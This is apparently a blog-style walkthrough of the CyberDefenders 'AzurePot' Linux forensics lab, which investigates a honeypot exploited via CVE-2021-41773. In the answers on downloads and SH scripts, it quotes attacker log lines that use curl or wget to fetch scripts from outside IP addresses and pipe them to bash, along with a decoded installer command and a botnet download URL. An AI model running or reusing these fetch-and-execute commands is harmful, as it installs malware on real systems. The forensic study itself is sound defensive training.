AzurePot Lab
CyberDefenders Endpoint Forensics Lab
Scenario
This Ubuntu Linux honeypot was deployed in Azure in early October to monitor activities related to the exploitation of CVE-2021–41773.
Initially, the system attracted a significant number of cryptocurrency miners. To mitigate this, a cron script was implemented to remove files named “kinsing” in the /tmp directory. This action was taken to prevent these miners from interfering so that more interesting activities could be observed.
There are three key files available: - sdb.vhd.gz: This file is a Virtual Hard Disk (VHD) of the main drive, obtained through an Azure disk snapshot. - ubuntu.20211208.mem.gz: This file is a memory dump created using Lime. - uac.tgz: This file contains the results of User Account Control (UAC) running on the system.
The artifacts were collected in the following order: the drive was snapshotted first, followed by the memory dump, and finally, the UAC results were gathered.
Question 1
There is a script that runs every minute to do cleanup. What is the name of the file?
Answer 1
Knowing the Linux file system is key here, after some research there was a few places I wanted to tray and find scheduled tasks (otherwise called cronjobs).
/etc/cron.hourly
/etc/crontab (the file)
/var/spool/cron/
I found the answer in the image above.
Question 2
The script in Q1 terminates processes associated with two Bitcoin miner malware files. What is the name of 1st malware file?
Answer 2
Following the file path to the file from question 1, I found the following inside the .remove.sh file:
#!/bin/bash
for PID in `ps -ef | egrep "kinsing|kdevtmp" | grep "/tmp" | awk '{ print $2 }'`
do
kill -9 $PID
done
chown root.root /tmp/k*
chmod 444 /tmp/k*
Question 3
The script changes the permissions for some files. What is their new permission?
Answer 3
The latter half the of script shows permissions being altered using chmod. In this case, 444.
Question 4
What is the SHA256 of the botnet agent file?
Answer 4
I found this answer in a rather funny way. While looking through various folders to try and find a clue, Windows Defender on my VM started blocking threats when I tried to view them on FTK Imager.
Press enter or click to view image in full size
The more correct way of doing this would be to look into the CVE that was provided and check the logs for the Apache HTTP Server. After looking into this I can see that there is an attempt to use the vulnerability to directory traverse.
Press enter or click to view image in full size
There are a couple of HTTP 200 codes within the log file, meaning that this was successful, along with some error codes. Knowing that the malware was activated. I searched the error_log file for signs of the above malware. I not only discovered another suspicious file that was downloaded using the wget command, but the dk86 file.
Question 5
What is the name of the botnet in Q4?
Answer 5
Question 6
What IP address matches the creation timestamp of the botnet agent file in Q4?
Answer 6
In the log file, I can see many commands that are attempting to grab the botnet agent file from the below IP address.
Question 7
What URL did the attacker use to download the botnet agent?
Answer 7
Same as the question before, the log file revealing the following address:
http://138.197.206.223/wp-content/themes/twentysixteen/dk86Question 8
What is the name of the file that the attacker downloaded to execute the malicious script and subsequently remove itself?
Answer 8
As I am looking for something that is going to delete itself, looking for the following command would be my first port of call:
rm -rfI couldn’t find anything in the log with either argument that lead to anything. Next I thought to try looking for curl/wget commands to see what the attacker had downloaded to the system. After a while I stumbled across some base64, which was extremely suspicious.
Press enter or click to view image in full size
Running most of it through CyberChef, I found the file I was looking for.
-o .install; chmod +x .install; sh .install > /dev/null 2>&1 & echo 'Done'; else echo 'Already install. Started';Question 9
The attacker downloaded SH scripts. What are the names of these files?
Answer 9
Filtering out some of the noise and only looking for wget requests once more, I was able to find .sh scripts that were downloaded after the above logs. 3 in total.
[Sun Nov 28 07:23:40.903543 2021] [dumpio:trace7] [pid 2632:tid 139978789074688] mod_dumpio.c(103): [client 40.117.148.240:47940] mod_dumpio: dumpio_in (data-HEAP): A=|echo;cd /dev/shm ; curl -s http://103.55.36.245/0_linux.sh -o 0_linux.sh || wget -q -O 0_linux.sh http://103.55.36.245/0_linux.sh; chmod 777 0_linux.sh; sh 0_linux.sh
[Sun Nov 28 10:29:56.398030 2021] [dumpio:trace7] [pid 2632:tid 139978529031936] mod_dumpio.c(103): [client 195.19.192.26:45304] mod_dumpio: dumpio_in (data-HEAP): A=|echo;(curl -s 45.137.155.55/ap.sh||wget -q -O- 45.137.155.55/ap.sh)|bash
[Sun Nov 28 10:30:29.432016 2021] [cgi:error] [pid 2632:tid 139978529031936] [client 195.19.192.26:45304] AH01215: curl: (23) Failed writing body (0 != 14024): /bin/sh
[Sun Nov 28 16:21:20.401016 2021] [dumpio:trace7] [pid 2632:tid 139978503853824] mod_dumpio.c(103): [client 212.193.57.225:51570] mod_dumpio: dumpio_in (data-HEAP): A=|echo;(curl -s 45.137.155.55/ap.sh||wget -q -O- 45.137.155.55/ap.sh)|bashQuestion 10
Two suspicious processes were running from a deleted directory. What are their PIDs?
Answer 10
For this I downloaded a new windows tool to help me out. w64devkit. Just to make it a little easier for myself when searching files, I dislike using findstr.
Within the files that were provided I started to comb through the process folder and look into each text file. I didn’t know this, but lsof is a term in unix that stands for list open files. So I narrowed my search to lsof_-Pl.txt.
~/Downloads/uac/live_response/process $ grep 'deleted' lsof_-nPl.txt
none 609 0 txt REG 0,1 8632 15254 / (deleted)
sleep 6388 1 cwd DIR 8,17 0 528743 /var/tmp/.log/101068/.spoollog (deleted)
sh 20645 1 cwd DIR 8,17 0 528743 /var/tmp/.log/101068/.spoollog (deleted)
sh 20645 1 10r REG 8,17 9087 528810 /var/tmp/.log/101068/.spoollog/.src.sh (deleted)
agettyd 24330 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 7897 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24333 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24334 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24335 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24336 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24337 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)Finding the above. The 2 PIDs (second column), being 6388 and 20645.
Question 11
What is the suspicious command line associated with the PID that ends with `45` in Q10?
Answer 11
The line in question is the 3rd row down, sh src.sh.
Question 12
UAC gathered some data from the second process in Q10. What is the remote IP address and remote port that was used in the attack?
Answer 12
There is another folder within the same directory as lsof_-nPl.txt called proc. This lists all the processes and gives them each a folder containing more information. So I found 20645 and went hunting, and found a txt file called environ.txt which gave me the following:
REMOTE_ADDR=116.202.187.77
QUERY_STRING=
OLDPWD=/var/tmp
HOME=/var/tmp/.log/101068/.spoollog/.api
HTTP_USER_AGENT=curl/7.79.1
DOCUMENT_ROOT=/usr/share/apache2/default-site/htdocs
REMOTE_PORT=56590Question 13
Which user was responsible for executing the command in Q11?
Answer 13
Using the proc number once again, I went searching inside ls_-la_proc.txt. Knowing that this would give me information about users, since ls -la is a common command in linux that show file permissions.
Question 14
Two suspicious shell processes were running from the tmp folder. What are their PIDs?
Answer 14
I used grep once again to go hunting through lsof_-nPl.txt
~/Downloads/uac/live_response/process $ grep '/tmp' lsof_-nPl.txt
sleep 6388 1 cwd DIR 8,17 0 528743 /var/tmp/.log/101068/.spoollog (deleted)
sh 15853 1 cwd DIR 8,17 12288 4059 /tmp
sh 20645 1 cwd DIR 8,17 0 528743 /var/tmp/.log/101068/.spoollog (deleted)
sh 20645 1 10r REG 8,17 9087 528810 /var/tmp/.log/101068/.spoollog/.src.sh (deleted)
sh 21785 1 cwd DIR 8,17 12288 4059 /tmp
agettyd 24330 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 7897 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24333 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24334 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24335 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24336 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)
agettyd 24330 24337 1 txt REG 8,17 7244192 30248 /tmp/agettyd (deleted)The first column gives me an idea to what type of processes was running, in this instance sh was what I was looking for. So 15853 and 21785 were the PIDs I was after.
Question 15
What is the MAC address of the captured memory?
Answer 15
This question stumped me. Regular use of volatility3 had no effect on the .mem file. I read another guide that talked about setting up a new profile for volatility to use, which I have never had to do before.
I am going to go about this a different way. Making a profile would be a good exercise, but I think there might be a simpler way of doing it. Looking back in the UAC files. Knowing I need to look for an address, the first place I checked was the network folder and scanned through the files.
I found an ifconfig file that contained what I was looking for.
Question 16
Based on Bash history. The attacker downloaded the SH script. What is the name of the file?
Answer 16
A bash history file is stored inside /home/[USER]/.bash_history, then I just searched for a .sh file, or you could look up a wget request to find the following:
I do need to learn how to make volatility profiles, something on my to do list, however finding the answer to the last 2 questions was much simpler this way. A challenging box, was fun though.
Last updated